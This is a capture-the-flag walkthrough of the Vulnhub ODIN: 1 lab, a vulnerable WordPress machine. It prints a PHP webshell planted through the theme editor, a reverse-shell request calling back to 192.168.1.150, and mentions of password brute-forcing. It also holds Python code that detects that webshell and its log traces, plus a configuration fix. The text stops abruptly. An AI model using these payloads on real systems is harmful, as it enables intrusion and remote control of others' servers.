Vulnhub - ODIN: 1
Introduction
Difficulty: Easy
Odin ventured to the Well of Mimir, near Jötunheim, the land of the giants, in the guise of a walker named Vegtam. Mímir, who guarded the well, asked him to sacrifice his left eye in order to drink from it, this being a symbol of his will to obtain knowledge.
This is ODIN: 1 from Vulnhub.
Ports
HTTP only.
HTTP
It says:
vikingarmy
Just another Joomla site
But that’s a little joke, because it’s actually WordPress.
root@kali:/opt/vulnhub/odin# wpscan -e --url http://odin
WPScan only finds a user called ‘odin’, but trying to log in at wp-admin as odin with any random password gives an error:
Unknown username. Check again or try your email address.
So that’s curious. What if we try admin?
Error: The password you entered for the username admin is incorrect
Right. So admin exists and odin does not. What’s up with that, WPScan? Lol.
We also have some encoded strings on the blog:
NB2HI4DTHIXS6Z3JORUHKYROMNXW2L3EMFXGSZLMNVUWK43TNRSXEL2TMVRUY2LTORZS6YTMN5RC63LBON2GK4RPKBQXG43XN5ZGI4ZPJRSWC23FMQWUIYLUMFRGC43FOMXXE33DNN4W65JOOR4HILTUMFZC4Z32EBZG6Y3LPFXXKIDONFRWKIDXN5ZGI3DJON2AU===
This is base32:
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz rockyou nice wordlist
We have this:
SWYgeW91IGxvb2sgY2xvc2VseSwgeW91IHdvbid0IG5lZWQgaXQgaGVyZQo=
Which is base64:
If you look closely, you won’t need it here
And this:
++++++++++[>+>+++>+++++++>++++++++++««-]»»++++++++++.+.+++++.————.+.+++++.——-.
Which appears to be brainf^%k (the « » and dash characters are presumably the blog’s smart-punctuation rendering of runs of <, > and -), and which translates to:
nottuzy
Which never turns out to be useful.
So a password attack on admin? Yes.
wp-admin
One of the blog posts is called:
Twenty Twenty: 404 Template (404.php)
Wonder if that is a hint?
We can edit the file here:
http://odin/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty
And add:
<?php system($_GET['cmd']);?>
into the upper part of the file beneath the opening html tag. We can then access the file at:
http://odin/wp-content/themes/twentytwenty/404.php?cmd=id
And issue commands. Like a shell. Like this:
GET /wp-content/themes/twentytwenty/404.php?cmd=php+-r+'$sock%3dfsockopen("192.168.1.150",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
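Two checks a defender would run against the implant described above, as an added example that is not part of the original writeup: a scan of theme PHP source for a request superglobal fed straight into a command-execution sink, and a scan of web-server access logs for direct requests to theme template files carrying a query string. The sample 404.php header and the log lines are constructed to mirror the writeup’s request.

```python
"""Detect the theme-editor webshell pattern used in the ODIN writeup.

Added example, not from the original writeup:
1. scan_theme_file(): flag PHP theme source where a request superglobal flows
   straight into a command-execution sink (the one-liner dropped into 404.php).
2. scan_access_log(): flag direct requests to theme template PHP files that
   carry a query string, which is how an implanted shell is driven.
"""
import re
from urllib.parse import urlsplit, parse_qs

SINKS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval)"
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["
WEBSHELL_RE = re.compile(SINKS + r"\s*\(\s*" + SUPERGLOBAL, re.IGNORECASE)

# Constructed sample of a tampered 404.php header, mirroring the writeup's implant.
SAMPLE_404 = """<?php get_header(); ?>
<?php system($_GET['cmd']);?>
<main id="site-content" role="main">
"""

def scan_theme_file(source: str):
    """Return (line_number, line) for every line matching sink(superglobal[...])."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        if WEBSHELL_RE.search(line):
            hits.append((n, line.strip()))
    return hits

# Theme template files are included by WordPress, not requested directly.
THEME_PHP_RE = re.compile(r"^/wp-content/themes/[^/]+/[^?]+\.php$")
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')

# Constructed combined-format access-log lines; the first mirrors the writeup's request.
SAMPLE_LOG = [
    '192.168.1.150 - - [01/Jan/2021:10:00:00 +0000] "GET /wp-content/themes/twentytwenty/404.php?cmd=id HTTP/1.1" 200 512',
    '192.168.1.150 - - [01/Jan/2021:10:00:05 +0000] "GET /wp-admin/theme-editor.php?file=404.php&theme=twentytwenty HTTP/1.1" 200 9000',
    '192.168.1.20 - - [01/Jan/2021:10:01:00 +0000] "GET /index.php?p=3 HTTP/1.1" 200 4096',
]

def scan_access_log(lines):
    """Return (client_ip, path, query_keys) for direct theme-PHP hits with a query string."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status = m.groups()
        parts = urlsplit(target)
        if THEME_PHP_RE.match(parts.path) and parts.query:
            findings.append((ip, parts.path, sorted(parse_qs(parts.query))))
    return findings
```

The fix that removes this vector entirely is `define('DISALLOW_FILE_EDIT', true);` in wp-config.php, which disables the theme and plugin editors in wp-admin.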
On the box
We can log in to MySQL with joomla:joomla and grab some hashes, but they don’t crack easily. There is a shortcut here, though: LinPEAS has a mode (-a) that will brute-force su, and we have weak passwords:
So really that’s it; let’s check it: